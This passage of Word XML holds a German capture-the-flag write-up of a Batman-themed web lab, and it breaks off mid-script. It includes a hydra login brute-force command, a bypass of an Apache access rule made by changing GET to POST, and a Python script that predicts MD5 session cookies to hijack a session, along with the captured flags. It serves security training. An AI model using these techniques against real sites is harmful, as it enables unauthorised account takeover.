        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>#print('')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C1B763" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A52FD3" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if compare_length != r.headers['content-length']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412889D8" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>print('differing id =' + str(start))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3CF54A" w14:textId="77777777" w:rsidR="00EA43D2" w:rsidRPr="004B5075" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004B5075">
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E71901E" w14:textId="38B0EC09" w:rsidR="000D4860" w:rsidRPr="004B5075" w:rsidRDefault="00EA43D2" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B5075">
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:tab/>
        <w:t>start += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765BDD59" w14:textId="7AD0119F" w:rsidR="00023D89" w:rsidRPr="004B5075" w:rsidRDefault="00023D89" w:rsidP="00EA43D2">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B41059D" w14:textId="609F6C72" w:rsidR="00023D89" w:rsidRDefault="00023D89" w:rsidP="00023D89">
      <w:r>
        <w:t>Könnte man in diesem Fall auch mit Content anstatt von Content-Length machen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E40B2E" w14:textId="3A475C8E" w:rsidR="000D4860" w:rsidRDefault="000D4860" w:rsidP="000D4860">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc438858"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Brute Force Passwort:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="5EB68E19" w14:textId="60FB4532" w:rsidR="000D4860" w:rsidRDefault="000D4860" w:rsidP="000D4860">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r w:rsidRPr="000D4860">
        <w:t>hydra -L usernames.txt -P passwords.txt http-get://10.85.229.145/wikileak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229A7525" w14:textId="3DBD1D79" w:rsidR="000D4860" w:rsidRDefault="00194C24" w:rsidP="000D4860">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B207357" wp14:editId="726AC844">
            <wp:extent cx="5400675" cy="1632585"/>
            <wp:effectExtent l="0" t="0" r="9525"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1632585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C2FA73" w14:textId="14552CF7" w:rsidR="000D4860" w:rsidRDefault="000D4860" w:rsidP="000D4860">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22AAC2A5" w14:textId="5C7A2464" w:rsidR="000D4860" w:rsidRDefault="00194C24" w:rsidP="00194C24">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF74EB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flag: wikileaks_1s_bad_4_batman_{92e2ce4eb1d88f318c18f454776cfbb1dc6db6f4851d6045b088b6ed}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D2ED77" w14:textId="3D036714" w:rsidR="001A4884" w:rsidRPr="008E799A" w:rsidRDefault="001A4884" w:rsidP="00194C24">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008E799A">
        <w:t>Mit</w:t>
      </w:r>
      <w:r w:rsidR="00B9634B" w:rsidRPr="008E799A">
        <w:t xml:space="preserve"> H</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:t xml:space="preserve">ilfe </w:t>
      </w:r>
      <w:r w:rsidR="00B9634B" w:rsidRPr="008E799A">
        <w:t xml:space="preserve">der vorgegebenen Usernamen und Passwort Dateien lässt sich mit dem </w:t>
      </w:r>
      <w:r w:rsidR="00BF35AD" w:rsidRPr="008E799A">
        <w:t xml:space="preserve">aufgeführten Befehl sehr leicht der Username </w:t>
      </w:r>
      <w:r w:rsidR="004D79B3" w:rsidRPr="008E799A">
        <w:t>bruce und das Passwort superman_sucks herausfinden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74281FE2" w14:textId="2282DD5E" w:rsidR="00194C24" w:rsidRDefault="00194C24" w:rsidP="00194C24">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc438859"/>
      <w:r>
        <w:t>Level 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="4A4617A9" w14:textId="57FE8024" w:rsidR="00C54CA8" w:rsidRDefault="00194C24" w:rsidP="00C54CA8">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc438860"/>
      <w:r>
        <w:t>Batcave Zuga</w:t>
      </w:r>
      <w:r w:rsidR="00C54CA8">
        <w:t>ng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="5631715C" w14:textId="3C5961ED" w:rsidR="00C54CA8" w:rsidRDefault="00C54CA8" w:rsidP="00C54CA8">
      <w:r>
        <w:t xml:space="preserve">Wenn man einen Request im Browser an </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="008246F0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.85.229.145/batcave</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> sendet, so muss man sich anmelden u Zugriff auf das Directory zu erhalten. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0E9923" w14:textId="607C07AE" w:rsidR="00C54CA8" w:rsidRDefault="00C54CA8" w:rsidP="00C54CA8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FFB72F2" wp14:editId="4C3828BF">
            <wp:extent cx="5400675" cy="1963420"/>
            <wp:effectExtent l="0" t="0" r="9525"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1963420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="194A0351" w14:textId="77777777" w:rsidR="00C54CA8" w:rsidRDefault="00C54CA8" w:rsidP="00C54CA8">
      <w:r>
        <w:t xml:space="preserve">Schaut man nun nach der „LimitExcept“ Directive so findet man unter </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:anchor="limitexcept" w:history="1">
        <w:r w:rsidRPr="008246F0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://httpd.apache.org/docs/2.4/de/mod/core.html#limitexcept</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> die Beschreibung dazu, die besagt, dass für alle http-Protokolle der Zugriff erlaubt ist, außer die Protokolle, die dort genannt sind. Deshalb habe ich in Burp das Protokoll von GET auf POST gesetzt und in der Response wurde direkt folgende Flag zurück geliefert:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113F8A30" w14:textId="186D71A8" w:rsidR="00C54CA8" w:rsidRDefault="00C54CA8" w:rsidP="00C54CA8">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r w:rsidRPr="00C54CA8">
        <w:t>b4tcave_l0cat1on_{9b66fed52c4dcbd28d5982bb6dd5320c6f2e627696869f99f6766ec4}</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ADED22" w14:textId="16705181" w:rsidR="00C54CA8" w:rsidRDefault="00C54CA8" w:rsidP="00C54CA8">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DF381A0" w14:textId="1C5C853F" w:rsidR="00C54CA8" w:rsidRDefault="00742A29" w:rsidP="00C54CA8">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46F5EF36" wp14:editId="44C89641">
            <wp:extent cx="5400675" cy="2047240"/>
            <wp:effectExtent l="0" t="0" r="952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2047240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="247089AC" w14:textId="26952861" w:rsidR="00742A29" w:rsidRDefault="00742A29" w:rsidP="00742A29">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
      </w:pPr>
      <w:r>
        <w:t>Neuer Request mit POST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433AE3A9" w14:textId="755F29D1" w:rsidR="00742A29" w:rsidRDefault="00742A29" w:rsidP="00742A29">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6110556B" wp14:editId="25F6CC89">
            <wp:extent cx="3576577" cy="2438633"/>
            <wp:effectExtent l="0" t="0" r="508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6340" cy="2445290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED43361" w14:textId="66857D33" w:rsidR="00742A29" w:rsidRDefault="00742A29" w:rsidP="00742A29">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
      </w:pPr>
      <w:r>
        <w:t>Zugehörige Antwort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A20F741" w14:textId="1DA32FC7" w:rsidR="00742A29" w:rsidRDefault="00742A29" w:rsidP="00742A29">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc438861"/>
      <w:r>
        <w:t>Struktur session_id</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="186C9FF7" w14:textId="78199B33" w:rsidR="00344096" w:rsidRDefault="00344096" w:rsidP="00344096">
      <w:r>
        <w:t xml:space="preserve">Der Algorithmus zur Erstellung der Session- ID ist der MD5 Algorithmus. Untersucht man den Header (Set-Cookie-Header), so sieht man, dass der „bat_session“-Token ein „md5_“ Zusatz zu Beginn hat für jede Session. Dieser Zusatz kann beim Erstellen </w:t>
      </w:r>
      <w:r w:rsidR="00D46C33">
        <w:t>des Hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> von dem verwendeten Programm vorangestellt</w:t>
      </w:r>
      <w:r w:rsidR="00D46C33">
        <w:t xml:space="preserve"> werden und sollte normalerweise entfernt werden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04400143" w14:textId="0528B6EB" w:rsidR="00D46C33" w:rsidRDefault="00D46C33" w:rsidP="00344096">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EEBB4FF" wp14:editId="538B6DBB">
            <wp:extent cx="4733925" cy="1485900"/>
            <wp:effectExtent l="0" t="0" r="9525"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1485900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FE1A62" w14:textId="04340B6F" w:rsidR="00D46C33" w:rsidRDefault="00D46C33" w:rsidP="00D46C33">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
      </w:pPr>
      <w:r>
        <w:t>Beispiel für session_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA764AF" w14:textId="28E59E1F" w:rsidR="00B808D3" w:rsidRPr="00B808D3" w:rsidRDefault="00D72E51" w:rsidP="00B808D3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Versucht man den Klartext des MD5 Hash herauszufinden (zum Beispiel durch eingeben in Google), so findet man heraus, dass alle Session-IDs demselben Muster folgen. Im Klartext handelt es sich immer um eine Nummer, die von vorne bis auf vier Stellen mit Nullen aufgefüllt wird (0001, 0002, …, 0010, …). Sobald man das weiß kann man mithilfe eines Python Skriptes verschiedene Hashes ausprobieren. Dazu muss nur das Python Skript aus einer vorherigen Aufgabe etwas abgewandelt werden. Das Beispielskript ist in der nächsten Aufgabe zu finden. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0B6DDC" w14:textId="3084A54E" w:rsidR="00D46C33" w:rsidRDefault="00D46C33" w:rsidP="00D46C33">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc438862"/>
      <w:r>
        <w:t>Hijack Batman Session</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="6BC6660B" w14:textId="0F5427AD" w:rsidR="0053218D" w:rsidRDefault="0053218D" w:rsidP="0053218D">
      <w:r>
        <w:t xml:space="preserve">Das Python Skript ist eine Abwandlung der </w:t>
      </w:r>
      <w:r w:rsidR="00320E79">
        <w:t xml:space="preserve">Aufgabe in der die Dokument ID abgefragt wurde. </w:t>
      </w:r>
      <w:r w:rsidR="000148C4">
        <w:t xml:space="preserve">Da die Struktur der Cookies sehr einfach ist, kann man </w:t>
      </w:r>
      <w:r w:rsidR="00670376">
        <w:t>hier durch die Cookies iterieren und überprüfen bei welcher Zahl (als MD5 Hash) sich an der Länge de</w:t>
      </w:r>
      <w:r w:rsidR="00B176BD">
        <w:t>r Response etwas ändert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A82C927" w14:textId="2AA1903E" w:rsidR="00904ABE" w:rsidRPr="0053218D" w:rsidRDefault="00904ABE" w:rsidP="0053218D">
      <w:r>
        <w:t xml:space="preserve">Dabei wird vor der Iteration noch ein Vergleichs Request </w:t>
      </w:r>
      <w:r w:rsidR="00122B1D">
        <w:t>durchgeführt mit dem die Antwort Länge verglichen wird.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E39BD37" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081CD235" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>import hashlib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B8EC08" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5543D243" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>protocoll = "http://"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E628A3" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>host = "10.85.229.47"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B1B5F5" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>path = "/bat_console/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019E2916" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>URL = protocoll + host + path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9AE37F" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="701642F2" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>headers = {'cookie': 'bat_session=md5_25bbdcd06c32d477f7fa1c3e4a91b032'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21133205" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78729B7E" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>start = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC41B05" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>end = 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014D7E8A" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>i = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FC20F1" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="278888DB" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>print(URL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF70D97" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD13BC1" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>t = requests.post(url = URL, headers = headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EE0778" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>compare_length = t.content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA174D1" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="630B30D1" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>print('start testing with ' + str(start))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5CB949" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>while start &lt;= end:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633D0CEB" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if start &lt; 10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382586B0" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">i = '000' + str(start) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ACD652" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>elif start &lt; 100:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA6CD1A" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>i = '00' + str(start)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19171299" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>elif start &lt; 1000:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25313B3F" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>i = '0' + str(start)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBA942F" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">else: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD3C709" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>i = str(start)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738776C3" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>#print(i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE41685" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">bat_cookie = 'bat_session=md5_' + hashlib.md5(i).hexdigest() </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F40B392" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">headers = {'cookie': bat_cookie} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7035DE46" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>#print(headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9D158B" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">temp_url = URL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5067E9" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>r = requests.post(url = temp_url, headers = headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAF3D7F" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>#print('length =' + r.headers['content-length'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D701AF" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>#print(r.content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61687A87" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>#print('')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003172BA" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="040AE958" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if compare_length != r.content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A6890C" w14:textId="77777777" w:rsidR="00D72E51" w:rsidRDefault="00D72E51" w:rsidP="00D72E51">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>print('')</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
